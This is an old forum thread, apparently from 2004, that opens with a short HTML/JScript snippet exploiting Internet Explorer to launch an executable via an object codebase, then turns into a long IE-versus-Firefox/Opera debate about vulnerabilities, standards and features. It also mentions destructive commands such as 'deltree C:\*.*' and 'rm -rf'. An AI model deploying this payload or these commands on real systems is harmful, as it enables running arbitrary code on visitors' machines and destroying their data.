*** THE FOLLOWING CODE IS FOR EDUCATIONAL PUPOSES ONLY THEREFORE I AM NOT RESPONSIBLE FOR ANY WAY YOU DECIDE TO DIRECTLY OR INDIRECTLY PUT THIS INTO ANY EXECUTABLE(PHP,EXE,JSP,JS,JAVA,HTML(with page maker),SO,AP,MAC APPLICATION,UNIX TAR,OS GUI) CAPABLE OF OUTPUTTING A FILE THAT CAN BE VIEWED IN A WEB DEVICE INCLUDING BUT NOT LIMITED TO COMPUTER,CELL PHONE,PDA,TABLET AND OR CRASHING THE EARTH INTO THE MOON AND OR SUN!!!***


<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>';
</script>

This code executes a program. This program can be ANY exe file on the local flesystem or any exe file on the web.

Yes, i've seen one embedded into a page before that added a deltree C:\*.* type command to the hardware profile webpage in windows XP. I still use IE, though, and i'm sure a code could be written for any browser to do the same thing.

good think i dont use C:\ as my default drive then, har har...

i only use IE upon occasion for when something doesnt work in FireFox (mostly just embedded WMV files)...

Internet Explorer has over 30 other unpatched security hazards at this time. Even then, if security isn't enough reason for you to not use IE, there are numerous other reasons. Most importantly, it doesn't support web standards. Additionally, it doesn't have modern browser features (tabbed browsing, built in popup blocker, etc).

Here's what happens when I create this file/try to access it:



Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: XMLid.Exploit
File: C:\Documents and Settings\AtmaWeapon\Desktop\test.html
Location: Quarantine
Computer: LINK
User: AtmaWeapon
Action taken: Quarantine succeeded : Access denied
Date found: Tuesday, July 13, 2004 11:48:21 AM

Windows is only as insecure as you make it. Using smart computing, it is possible to do just fine with no virus scanner and using IE. Using layered security, even if you manage to go somewhere you shouldn't, you are still safe.

Many people suggest "Use Firefox/Mozilla/Opera" as a course of action. This is a good idea, but if the user doesn't patch, they are still vulnerable. Firefox has 6 vulnerabilities (http://secunia.com/search/?search=Firefox). Mozilla has 40 vulnerabilities (http://secunia.com/search/?search=Mozilla&w=0). Opera has 122 vulnerabilities (http://secunia.com/search/?search=Opera). I know Mozilla/FireFox patch regularly, but if Joe User won't run Windows Update once in a while, what makes you think he's going to patch his browser often?

IE provides dismal support for web standards, just like FireFox/Mozilla/Opera. Check http://www.quirksmode.org, you'll find that your browser isn't as compliant as you think (Opera in particular).

IE doesn't have the features of the other browsers right now, but watch MS over the next few months. From a few articles I've seen, they're starting to notice that they are not performing well vs. the other browsers. They are also starting to move towards fixing that.

I use an IE add-on that gives me said browsing features. Plenty of people claim that it's "stupid to have to download all the features", and I say that may be (http://update.mozilla.org/), but a browser that comes with the features enabled (http://www.opera.com) would be unspeakably bloated, and buggy to boot.

Of course, if you stay away from websites like "1337w4r3z.com", don't use filesharing, and never open attachments without some kind of verification you have a lot less to worry about. Who do you think is more likely to attempt this exploit, NBC or Claria (AKA Gator)?


HTML(with page maker)

LOL page maker is the only way to make HTML?

AtmaWeapon, at that quirksmode site is there a page that shows what will not display correctly in various browsers?

Heh...IE sucks...on our computer, it is the devil. Seriously...when we were reformatting our hard drive, it did everything it could to stop us. We had a zillion pop-ups that wouldn't go away, windows that kept popping up and saying things like, "Cannot delete." and other crap. Even after we reformatted, we had problems with IE. Of course, a good virus scanner and ad-aware took care of most of the problems. But still, I don't trust it. We've never had a good experience with IE, and in my opinion it's a piece of crap.

I use Firefox, and JJ uses Opera. Firefox is actually quite good. Not to mention it goes along with my name... :tongue:

Honestly Atma, I don't know why you've chosen to be such a Microsoft fanboy, but every time something comes up about Browsers or Operating Systems you seem to blindly follow Microsoft, even going as far as to make excuses for the company. I am not opposed to Microsoft. Windows XP is my primary OS, and it keeps me stable and online for weeks at a time. However, I’ve found a browser that has more features than internet explorer, has said features streamlined in a very intuitive gui, runs fast, and takes up less memory than IE. This browser is Mozilla Firefox. It is foolish to say "Well, I am going to wait on IE, because they will someday have those features!" IE is years behind the competition.

And don't think that citing useless sources is getting you anywhere. Firstly, I found that your statistics took the exploits from every version of every browser you cited. Now, I understand that a few people may still be using phoenix, or opera 5.x, but for all useful purposes, these browsers have been weeded out. None of these browsers require an upgrading fee and all have fairly streamline installers that even “Joe User” can use about once a year. That said, lets use your source, secunia.com, as a useful tool for today’s world.

Here (http://secunia.com/product/761/) is a page describing the security exploits of Opera 7.x in 2003 and 2004. There are currently 26 security advisories for Opera 7.x. Of these advisories, 4% are extremely critical, 13% are highly critical, 25% are moderately critical, 42% are less critical, and 17% are not critical at all. (see the pie-chart (http://secunia.com/graph/?type=cri&period=all&prod=761))

here (http://secunia.com/product/11/) is the page describing Microsoft Internet Explorer 6.0 during 2003 and 2004. There are current 55 security advisories for IE6. Of these 15% are extremely critical, 28% are highly critical, 26% are moderately critical, only 13% are less critical, and 18% are not critical at all. (here is the pie-chart (http://secunia.com/graph/?type=cri&period=all&prod=11))

And finally, here (http://secunia.com/product/3256/) is the page for Firefox . Of the 6 vulnerabilities you claimed it has, 4 are moderately critical, and 2 are less critical. (pie-chart (http://secunia.com/graph/?type=cri&period=all&prod=3256))

So, as a review for the people too lazy to check out the links or examine the data:
• IE6 has 55 security advisories at secunia.com, of which 43% are either highly or extremely critical.
• Opera has 26 security advisories at secunia.com, of which 17% are either highly or extremely critical.
• Firefox has 6 security advisories at secunia.com, of which 0% are either highly or extremely critical.

IE6 has more vulnerabilities, and a much higher percentage of it’s advisories are highly dangerous.

Basically, there are few reasons not to use Firefox or another browser, at least until IE finally catches up to the pack. For the time being, they are safer, quicker, and they have more features. If you want features galore, go with Opera, if you want to stick with the basics, go with Firefox, but for god’s sake there isn’t much you can use to defend IE at this point.

Honestly Atma, I don't know why you've chosen to be such a Microsoft fanboy, but every time something comes up about Browsers or Operating Systems you seem to blindly follow Microsoft, even going as far as to make excuses for the company.

Oh, so it's not alright if a person defends a certain company and brings valid points to back up his case? And it's not alright to advocate the usage of one browser over another? Just checking, because I sure as hell wouldn't want you or anyone else to do the same thing.

Oh, so it's not alright if a person defends a certain company and brings valid points to back up his case? And it's not alright to advocate the usage of one browser over another? Just checking, because I sure as hell wouldn't want you or anyone else to do the same thing.

But IE sucks. Even Homeland said to stop using it because it sucks. (http://story.news.yahoo.com/news?tmpl=story&cid=74&e=3&u=/cmp/20040702/tc_cmp/22103407)

Oh, so it's not alright if a person defends a certain company and brings valid points to back up his case? And it's not alright to advocate the usage of one browser over another? Just checking, because I sure as hell wouldn't want you or anyone else to do the same thing.

You seemed to miss the point. Atma seems to like programs because they are mainstream microsoft products, not because of the actual advantages the products offer. He loves Avant-browser, but is there any doubt that he would throw a hissy-fit if firefox required a 3rd party download for half of its features? Because, after all, Joe internet-user wouldn't download that.

I honestly don't care what browser you use, but if you go around trying to prove that IE is better than the other browsers, I am going to challenge that, because I feel the evidence shows otherwise.

I stopped using I.E. ages ago because I prefer Mozilla. One of the reasons I don't like I.E. is because it seems like such a target. I've never had any problems with Mozilla. But, if you update your I.E. all the time, and run a firewall/virus scanner, I guess you're ok. Also, I.E. seems fine so long as you don't hit any sites that really trash you. Blah blah. It all really comes down to preference. Do you prefer I.E. or something else? I know many people hate I.E. because of past versions fucking up for them so badly.

Some older I.E. version were really bad, it was so easy to make pages to crash PCs or install viruses and what not. So that's a reason not to like I.E. if you don't like to keep going for updates just to stay secure. Oh well, who cares? You can always reinstall your OS.

Hi gdorf, once again you are chosing a bandwagon approach against me. I'll bite.

I am not a fanboy of Microsoft products, but I am no fanboy of Linux either. I use MS Office, but before I installed it I tried to use OOo. I wanted to use OOo because I figured I would be better off in the long run. I had it installed for about 2 weeks, but the compatibility with the Word documents I have to work with (University uses .doc often, even though .pdf is the standard) made it a pretty bad choice. For some reason, it decided the proper place for the left margin was -2", off of the paper. Whatever. I use XP instead of Linux mainly because I know very much more about XP, and I don't have time to learn Linux.

At work, I use Firefox. I have a slow computer with limited RAM, and it just seems to perform a little better than IE. However, this may be due to differences in rendering. It looks as if IE renders first, then paints. Firefox looks like it renders text, paints, then adds images as they are downloaded. If this is true, then it is difficult to say which one is faster.

Now I'm going to go bit by bit, in no particular order, over the things that I find in EVERY browser thread that I disagree with. I will also show why I disagree with them. I am installing the newest available stable Firefox for the purposes of this test, it is superior to Mozilla IMO. Extensions will be installed to simulate the Avant Browser setup I am used to as closely as possible. I used the following: All-in-one-gestures, single window, and adblock.

For starters, I hate the Mozilla dev team for giving FireFox a "proper" installer. I loved it when installation was just "download file, extract folder". Sure, it was kind of inconvenient to create shortcuts manually, but it came with the convenience of knowing that when I delete the folder, EVERYTHING that has to do with the program is gone. Now that is uses an installer, it misses things.

OK, now for the points.

Memory usage
1024x768 screenshot (~670KB) (http://www.atmaweapon.org/browser/images/memoryusage.png)
I found that Firefox consumes considerable memory compared to Avant Browser. Note I had the same page open in both Firefox and Avant Browser, but Avant also has an extra page open while using less RAM AND less page file.

Patching
You really really REALLY missed my point on this one. I don't claim the holes in Mozilla and Firefox were recent, however I do claim that if someone is running an old version, they are vulnerable. Sure, people like you and me are going to set up an underwear tent every time version 0.9.2 build 3405 is replaced by build 3406, but most people don't care. Many people I see use "Install Firefox problem solved" as their answer to any IE problem. This will solve it for a time, but what happens when the next exploit comes around? Joe User doesn't update, and it doesn't matter what software you are using if you don't ever patch. Mozilla does have a spiffy relase cycle and a much faster bugfix record than IE, but that means nothing when the end user doesn't upgrade. So please use "Install Firefox upgrade every chance you get problem solved" instead. I chalk up Microsoft's lack of concern for many security issues as of late to the fact that they are probably putting most of their devs on SP2 and Longhorn. It's not a good excuse, but it makes me feel better about it.

Rendering/Compliance
Look at this page (http://www.ece.msstate.edu/~janem/ECE3724/SUM03/Presentations/microintro_files/frame.htm) in IE, then look at it in Firefox. These were required notes for me to view. I don't care whether it's that the code is IE proprietary, I needed to view the page. quirksmode.org's W3C compatibility tests show that none of the three browsers fully and correctly support the W3C standards.

3rd Party add-ons
Somehow you took my point "people whine that you have to use add-ons for IE" and got "I hate programs that make you use add-ons" from it. Wrong. Actually, standalone IE is all I need to surf the internet. Pop-up blocking, ad blocking, and tabbed browsing are conveniences. Something I don't understand, though, is why it is so hard to get Firefox to only use tabs.

User Interface
Even with the Single Window extension installed, Firefox still opened a few pages in another window. (When I had to install the flash player I got a couple new windows instead of a tab.) It's right on the front page of the Firefox product page, yet it doesn't deliver as promised. Before the single Window extension I had lots of problems getting links to open in tabs instead of extra windows.

What the heck kind of user interface is desirable, anyway? Let's compare the primary UI components of IE and Firefox (the differences are startling!):

IE:
address bar back button forward button stop button refresh button search button email button favorites menu

Firefox:
address bar back button forward button stop button refresh button search bar favorites menu

I use IE not out of some kind of fanboy desire, but because I still see no need to change. Firefox is taking 15.3MB of my hard drive, 30MB of my RAM, and doing the same job that IE is doing. It's the same as my feelings on Linux. I could switch to Linux and learn to do everything I do in Windows. But what's the point of changing operating systems if the one I have works? The browser I've got works, and I see no reason to spend the time configuring and tweaking another to do the same thing that the one I have does.

C:/? Don't you mean C:\?

/ is for *nix systems. I guess it would be for me "su -c "rm -rf"" and then enter my root password, which the webpage *must* know, I'm sure.

Linux makes me safer.

I use IE not out of some kind of fanboy desire, but because I still see no need to change. Firefox is taking 15.3MB of my hard drive, 30MB of my RAM, and doing the same job that IE is doing. It's the same as my feelings on Linux. I could switch to Linux and learn to do everything I do in Windows. But what's the point of changing operating systems if the one I have works? The browser I've got works, and I see no reason to spend the time configuring and tweaking another to do the same thing that the one I have does.

That pretty much sums up why I continue to use IE. No reason to change. Also, as a web developer I like the seamless transition from IE to Explorer and vice versa. I gave Mozilla a try once then when I worked a little bit on a website I found myself using IE all the time. So I said, the hell with it and never used it again. Still keep it around for capatibility checking though.

lets hope that they have repaired the errors in service pack 2. SP2 is following the same route as Duke Nukem Forever and Half-Life 2. :P "When it's done."

Duke Nukem Forever won the "lifetime achievement award" for vaporware. Nothing can beat that.

I don't have a choice to use IE. They haven't been so kind as to release it for Linux yet.

C:/? Don't you mean C:\?

/ is for *nix systems. I guess it would be for me "su -c "rm -rf"" and then enter my root password, which the webpage *must* know, I'm sure.

Linux makes me safer.

this made me LOL

Actually when doing something with a lot of javascript or CSS I like to use Mozilla and Firefox as well as IE to make sure it works fine in all 3 big browsers. I don't speak Opera moon-DHTML so if it works in everything but Opera I say it's still :cool: